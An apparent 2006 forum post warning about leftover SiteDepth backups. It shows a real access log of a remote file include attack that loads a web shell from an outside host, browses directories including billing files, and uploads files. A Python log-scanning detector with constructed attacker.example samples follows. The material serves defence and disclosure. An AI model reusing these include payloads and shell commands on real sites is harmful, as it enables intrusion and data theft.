#21 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
Wordpress: http://wordpress.org/development/2006/07/wordpress-204/
If you run sitedepth, you might want to make sure you clean up the old backups after the upgrades are done. Here's a log showing how XSS works using a current, updated version of sitedepth. The new version was fixed with a patch from SiteDepth due to this thread; however, they methodically store their 'old versions' after upgrade in a pretty predictable manner. No problem for the script kiddie to stumble across the files he needed. After this person exploited the site, they loaded a shell on one of the sitedepth main scripts located in a directory which was world-writable -- way to go, guys.

Code:
```
84.169.229.61 - - [02/Aug/2006:17:17:28 -0400] "GET /sd3/ HTTP/1.1" 404 202 "http://www.xxx-xxxxxx.com/sd3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
84.169.229.61 - - [02/Aug/2006:17:58:53 -0400] "GET /sitedepth3/ HTTP/1.1" 200 1101 "http://www.xxx-xxxxxx.com/sitedepth3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
[guy surfs front page of site to confirm site is running sitedepth. clipped]
84.169.229.61 - - [02/Aug/2006:18:01:04 -0400] "GET /constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:13 -0400] "GET /sitedepth3/constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt? HTTP/1.1" 200 8 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:19 -0400] "GET /sitedepth3/backup/ HTTP/1.1" 403 220 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:26 -0400] "GET /sitedepth3/backup/previous_versions/ HTTP/1.1" 403 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:35 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt? HTTP/1.1" 200 5469 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:42 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=. HTTP/1.1" 200 18624 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:46 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 22411 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=." "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:55 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 8457 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:06 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 142138 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=." "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:16 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//_old_sitedepth HTTP/1.1" 200 76195 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:26 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//sections HTTP/1.1" 200 9534 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:33 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//previews HTTP/1.1" 200 9534 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:42 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//ccbill HTTP/1.1" 200 18781 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:50 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=file&file=/var/www/xxuserxx/xxx-xxxxxx.com/ccbill/*index.htm HTTP/1.1" 200 16180 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//ccbill" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:03:08 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//sections HTTP/1.1" 200 9534 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:03:11 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=upload&dir=/var/www/xxuserxx/xxx-xxxxxx.com/sections&lastcmd=dir&lastdir=/var/www/xxuserxx/xxx-xxxxxx.com/sections HTTP/1.1" 200 5670 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//sections" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:03:22 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 5132 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=upload&dir=/var/www/xxuserxx/xxx-xxxxxx.com/sections&lastcmd=dir&lastdir=/var/www/xxuserxx/xxx-xxxxxx.com/sections" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
```
__________________
SnapReplay.com a different way to share photos - iPhone & Android
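A defender-side check for the pattern in the log above, added here as an example and not code from the thread or from SiteDepth: it parses combined-format access-log entries, flags any query value that is itself an absolute URL (the remote include attempt against `SD_DIR`), flags requests that reach into leftover backup/previous-version paths, and flags shell commands riding on the same request. The IPs, the include host `attacker.example` and the paths in the sample entries are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl
# Apache "combined" access-log format, the layout of the entries in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A query value that is itself an absolute URL marks a remote file include attempt.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Stale copies of earlier releases left under the web root (what the attacker used).
BACKUP_PATH_RE = re.compile(r'/backup/|/previous_versions/|/_old_', re.IGNORECASE)
# Commands a dropped web shell takes; only flagged when an RFI marker is also present.
SHELL_CMDS = {"dir", "file", "upload"}

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])  # split the request target into path and query
    rec["path"] = parts.path
    rec["params"] = dict(parse_qsl(parts.query, keep_blank_values=True))  # %-decoded
    return rec

def classify(rec):
    # Indicators found in one parsed entry; an empty list means nothing suspicious.
    findings = [f"rfi:{k}" for k, v in rec["params"].items() if REMOTE_URL_RE.match(v)]
    if BACKUP_PATH_RE.search(rec["path"]):
        findings.append("stale-backup-path")
    cmd = rec["params"].get("cmd")
    if cmd in SHELL_CMDS and any(f.startswith("rfi:") for f in findings):
        findings.append(f"shell-cmd:{cmd}")
    return findings

def scan(lines):
    # (ip, status, path, findings) for every entry that carries an indicator.
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec and (findings := classify(rec)):
            alerts.append((rec["ip"], rec["status"], rec["path"], findings))
    return alerts
# Constructed sample entries (documentation IPs, invented include host and paths), modelled on the log in the post.
SAMPLE_LOG = """\
198.51.100.7 - - [02/Aug/2006:18:01:13 -0400] "GET /sitedepth3/constants.php?SD_DIR=http://attacker.example/shell.txt? HTTP/1.1" 200 8 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Aug/2006:18:01:35 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http://attacker.example/shell.txt? HTTP/1.1" 200 5469 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Aug/2006:18:03:11 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fattacker.example%2Fshell.txt%3F&&s=r&cmd=upload&dir=/var/www/site/sections HTTP/1.1" 200 5670 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Aug/2006:18:05:00 -0400] "GET /sitedepth3/index.php?page=about HTTP/1.1" 200 1101 "-" "Mozilla/5.0"
"""
```

Note that the same include attempt against the patched current `constants.php` and against the stale 2.74 copy both return 200; the response size is what separates a no-op from a successful include, so alert on the indicator rather than on the status code.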